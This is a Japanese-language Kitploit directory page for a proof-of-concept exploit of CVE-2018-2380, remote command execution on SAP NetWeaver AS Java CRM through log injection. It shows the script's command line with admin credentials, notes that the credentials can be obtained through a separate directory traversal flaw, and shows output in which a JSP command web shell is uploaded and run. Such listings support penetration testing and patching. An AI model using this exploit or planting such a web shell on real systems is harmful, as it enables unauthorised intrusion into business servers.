Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-2380 — SAP NetWeaver AS JAVA CRM 上のログインジェクションを介したリモートコマンド実行のPoC | Kitploit
ツール/GitHubGitHub/erpscanteam/cve-2018-2380
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHuberpscanteam/cve-2018-2380

CVE-2018-2380

SAP NetWeaver AS JAVA CRM 上のログインジェクションを介したリモートコマンド実行のPoC

リポジトリを見る
51128年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-2380 (CVSS v3 Base Score: 6.6/10)

SAP NetWeaver AS JAVA CRM上のログインジェクションを介したリモートコマンド実行のPoC スクリプト使用例

root@kitploit:~
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

ここで --host はSAPサーバーのIP --port SAP NetWeaver AS Javaのポート SAP管理者のユーザー名とパスワードは、SAP Redwoodディレクトリトラバーサル脆弱性を使用して取得できます。

スクリプト使用例の出力

root@kitploit:~
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380


[!] ログインジェクションを使用してRCEを取得しようとしています
[!] リクエスト用の j_salt トークンを取得しています
[!] SAPポータルにログインしています
[!] ログパスを変更しています
[!] "Runtime.getRuntime().exec(request.getParameter("cmd")) " シェルを https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig にアップロードしています
[!] ログパスを ./default_log_name.log に復元しています
[!] お楽しみください!

C:\exploits\SAP>
ツールをダウンロード